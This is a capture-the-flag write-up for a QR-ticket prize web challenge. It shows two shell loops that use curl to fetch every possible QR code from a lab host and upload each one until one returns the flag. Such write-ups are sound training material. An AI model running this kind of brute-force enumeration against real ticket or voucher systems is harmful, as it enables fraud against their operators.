This game allows to request a unique ticket that can be scanned and exchanged for different prizes.
But the task is to get most precious of them all the FLAG.
Try to figure out how to do it.
Do You like winning big prizes? This is one and only chance to get lucky! http://10.XX.32.131/
The website allows to either request ticket or scan ticket.
Requesting ticket outputs a text "Here's Your ticket. Save it and scan it to see if You are the lucky ONE!" and QR image, which corresponds to a 3-digit number, e.g., 730.
Looking at the HTML source reveals how the QR image is generated. This number (730) is generated randomly on each request.
<p><center>Here's Your ticket. Save it and scan it to see if You are the lucky ONE!</center></p>
<center><img src="gen.php?s=qrh&d=730"</center>
Scanning the same ticket (uploading) outputs "This time ticket is not valid for main prize, better luck next time". Therefore, the idea must be to upload "correct" QR code.
Using a shell script, download all possible QR codes.
$ for i in $(seq 111 999); do curl -s "http://10.XX.32.131/gen.php?s=qrh&d=$i" -o qr$i.png; done
Using a shell script, upload each of QR code. The flag is retrieved on a QR code with number 931.
$ for i in $(seq 111 999); do echo -n "$i: "; curl -F "fileToUpload=@qr$i.png" -F "filename=image.png" -F "submit=Scan" http://10.XX.32.131/reader.php; echo; done
(..)
<center><h1>Flag: b11ec78ecbc456cfe02d02b842c5dc0f</h1></center>
(..)